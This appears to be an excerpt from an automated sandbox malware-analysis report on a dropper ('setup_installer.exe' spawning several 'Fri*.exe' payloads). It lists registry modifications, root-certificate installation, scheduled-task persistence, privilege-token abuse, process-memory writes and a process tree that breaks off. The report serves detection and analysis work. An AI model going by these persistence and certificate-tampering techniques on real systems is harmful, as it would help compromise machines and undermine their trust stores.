\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{4B3D9131-9FC0-11EF-9CB4-D238DC34531D} = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\SearchScopes\UpgradeTime = 20e5a51ccd33db01 iexplore.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-422 = "Russian Standard Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" Fri003da4b0a49fa71b6.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-552 = "North Asia Standard Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time" Fri003da4b0a49fa71b6.exe Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-522 = "N. Central Asia Standard Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" Fri003da4b0a49fa71b6.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 Fri0009837acb0e3f.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 Fri0009837acb0e3f.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 csrss.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 csrss.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2360 schtasks.exe 1796 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 13 IoCs
pid Process 2436 Fri009539f6ca3c9b1.exe 832 Fri005fb51f7290280.exe 700 Fri00ea564f2dd.exe 832 Fri005fb51f7290280.exe 1656 powershell.exe 1096 powershell.exe 1788 Fri003da4b0a49fa71b6.exe 1684 Fri003da4b0a49fa71b6.exe 1684 Fri003da4b0a49fa71b6.exe 1684 Fri003da4b0a49fa71b6.exe 1684 Fri003da4b0a49fa71b6.exe 1684 Fri003da4b0a49fa71b6.exe 2440 powershell.exe -
Suspicious use of AdjustPrivilegeToken 44 IoCs
description pid Process Token: SeCreateTokenPrivilege 944 Fri0024e24e95c5.exe Token: SeAssignPrimaryTokenPrivilege 944 Fri0024e24e95c5.exe Token: SeLockMemoryPrivilege 944 Fri0024e24e95c5.exe Token: SeIncreaseQuotaPrivilege 944 Fri0024e24e95c5.exe Token: SeMachineAccountPrivilege 944 Fri0024e24e95c5.exe Token: SeTcbPrivilege 944 Fri0024e24e95c5.exe Token: SeSecurityPrivilege 944 Fri0024e24e95c5.exe Token: SeTakeOwnershipPrivilege 944 Fri0024e24e95c5.exe Token: SeLoadDriverPrivilege 944 Fri0024e24e95c5.exe Token: SeSystemProfilePrivilege 944 Fri0024e24e95c5.exe Token: SeSystemtimePrivilege 944 Fri0024e24e95c5.exe Token: SeProfSingleProcessPrivilege 944 Fri0024e24e95c5.exe Token: SeIncBasePriorityPrivilege 944 Fri0024e24e95c5.exe Token: SeCreatePagefilePrivilege 944 Fri0024e24e95c5.exe Token: SeCreatePermanentPrivilege 944 Fri0024e24e95c5.exe Token: SeBackupPrivilege 944 Fri0024e24e95c5.exe Token: SeRestorePrivilege 944 Fri0024e24e95c5.exe Token: SeShutdownPrivilege 944 Fri0024e24e95c5.exe Token: SeDebugPrivilege 944 Fri0024e24e95c5.exe Token: SeAuditPrivilege 944 Fri0024e24e95c5.exe Token: SeSystemEnvironmentPrivilege 944 Fri0024e24e95c5.exe Token: SeChangeNotifyPrivilege 944 Fri0024e24e95c5.exe Token: SeRemoteShutdownPrivilege 944 Fri0024e24e95c5.exe Token: SeUndockPrivilege 944 Fri0024e24e95c5.exe Token: SeSyncAgentPrivilege 944 Fri0024e24e95c5.exe Token: SeEnableDelegationPrivilege 944 Fri0024e24e95c5.exe Token: SeManageVolumePrivilege 944 Fri0024e24e95c5.exe Token: SeImpersonatePrivilege 944 Fri0024e24e95c5.exe Token: SeCreateGlobalPrivilege 944 Fri0024e24e95c5.exe Token: 31 944 Fri0024e24e95c5.exe Token: 32 944 Fri0024e24e95c5.exe Token: 33 944 Fri0024e24e95c5.exe Token: 34 944 Fri0024e24e95c5.exe Token: 35 944 Fri0024e24e95c5.exe Token: SeDebugPrivilege 1656 powershell.exe Token: SeDebugPrivilege 1096 powershell.exe Token: SeDebugPrivilege 2044 Fri00787d8fbee5ae2.exe Token: SeDebugPrivilege 2648 Fri006106b9f3.exe Token: SeDebugPrivilege 2292 taskkill.exe Token: SeDebugPrivilege 2552 taskkill.exe Token: SeDebugPrivilege 1788 Fri003da4b0a49fa71b6.exe Token: SeImpersonatePrivilege 1788 Fri003da4b0a49fa71b6.exe Token: SeDebugPrivilege 2440 powershell.exe Token: SeSystemEnvironmentPrivilege 1708 csrss.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 2304 iexplore.exe 2220 iexplore.exe -
Suspicious use of SetWindowsHookEx 10 IoCs
pid Process 2304 iexplore.exe 2304 iexplore.exe 2220 iexplore.exe 2220 iexplore.exe 1964 IEXPLORE.EXE 1964 IEXPLORE.EXE 3004 IEXPLORE.EXE 3004 IEXPLORE.EXE 1964 IEXPLORE.EXE 1964 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2360 wrote to memory of 2784 2360 setup_installer.exe 31 PID 2360 wrote to memory of 2784 2360 setup_installer.exe 31 PID 2360 wrote to memory of 2784 2360 setup_installer.exe 31 PID 2360 wrote to memory of 2784 2360 setup_installer.exe 31 PID 2360 wrote to memory of 2784 2360 setup_installer.exe 31 PID 2360 wrote to memory of 2784 2360 setup_installer.exe 31 PID 2360 wrote to memory of 2784 2360 setup_installer.exe 31 PID 2784 wrote to memory of 2428 2784 setup_install.exe 33 PID 2784 wrote to memory of 2428 2784 setup_install.exe 33 PID 2784 wrote to memory of 2428 2784 setup_install.exe 33 PID 2784 wrote to memory of 2428 2784 setup_install.exe 33 PID 2784 wrote to memory of 2428 2784 setup_install.exe 33 PID 2784 wrote to memory of 2428 2784 setup_install.exe 33 PID 2784 wrote to memory of 2428 2784 setup_install.exe 33 PID 2784 wrote to memory of 1684 2784 setup_install.exe 34 PID 2784 wrote to memory of 1684 2784 setup_install.exe 34 PID 2784 wrote to memory of 1684 2784 setup_install.exe 34 PID 2784 wrote to memory of 1684 2784 setup_install.exe 34 PID 2784 wrote to memory of 1684 2784 setup_install.exe 34 PID 2784 wrote to memory of 1684 2784 setup_install.exe 34 PID 2784 wrote to memory of 1684 2784 setup_install.exe 34 PID 2428 wrote to memory of 1096 2428 cmd.exe 35 PID 2428 wrote to memory of 1096 2428 cmd.exe 35 PID 2428 wrote to memory of 1096 2428 cmd.exe 35 PID 2428 wrote to memory of 1096 2428 cmd.exe 35 PID 2428 wrote to memory of 1096 2428 cmd.exe 35 PID 2428 wrote to memory of 1096 2428 cmd.exe 35 PID 2428 wrote to memory of 1096 2428 cmd.exe 35 PID 1684 wrote to memory of 1656 1684 cmd.exe 36 PID 1684 wrote to memory of 1656 1684 cmd.exe 36 PID 1684 wrote to memory of 1656 1684 cmd.exe 36 PID 1684 wrote to memory of 1656 1684 cmd.exe 36 PID 1684 wrote to memory of 1656 1684 cmd.exe 36 PID 1684 wrote to memory of 1656 1684 cmd.exe 36 PID 1684 wrote to memory of 1656 1684 cmd.exe 36 PID 2784 wrote to memory of 276 2784 setup_install.exe 37 PID 2784 wrote to memory of 276 2784 setup_install.exe 37 PID 2784 wrote to memory of 276 2784 setup_install.exe 37 PID 2784 wrote to memory of 276 2784 setup_install.exe 37 PID 2784 wrote to memory of 276 2784 setup_install.exe 37 PID 2784 wrote to memory of 276 2784 setup_install.exe 37 PID 2784 wrote to memory of 276 2784 setup_install.exe 37 PID 2784 wrote to memory of 964 2784 setup_install.exe 38 PID 2784 wrote to memory of 964 2784 setup_install.exe 38 PID 2784 wrote to memory of 964 2784 setup_install.exe 38 PID 2784 wrote to memory of 964 2784 setup_install.exe 38 PID 2784 wrote to memory of 964 2784 setup_install.exe 38 PID 2784 wrote to memory of 964 2784 setup_install.exe 38 PID 2784 wrote to memory of 964 2784 setup_install.exe 38 PID 2784 wrote to memory of 1476 2784 setup_install.exe 39 PID 2784 wrote to memory of 1476 2784 setup_install.exe 39 PID 2784 wrote to memory of 1476 2784 setup_install.exe 39 PID 2784 wrote to memory of 1476 2784 setup_install.exe 39 PID 2784 wrote to memory of 1476 2784 setup_install.exe 39 PID 2784 wrote to memory of 1476 2784 setup_install.exe 39 PID 2784 wrote to memory of 1476 2784 setup_install.exe 39 PID 2784 wrote to memory of 1484 2784 setup_install.exe 40 PID 2784 wrote to memory of 1484 2784 setup_install.exe 40 PID 2784 wrote to memory of 1484 2784 setup_install.exe 40 PID 2784 wrote to memory of 1484 2784 setup_install.exe 40 PID 2784 wrote to memory of 1484 2784 setup_install.exe 40 PID 2784 wrote to memory of 1484 2784 setup_install.exe 40 PID 2784 wrote to memory of 1484 2784 setup_install.exe 40 PID 2784 wrote to memory of 2020 2784 setup_install.exe 41 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2360 -
C:\Users\Admin\AppData\Local\Temp\7zS839971D6\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS839971D6\setup_install.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2784 -
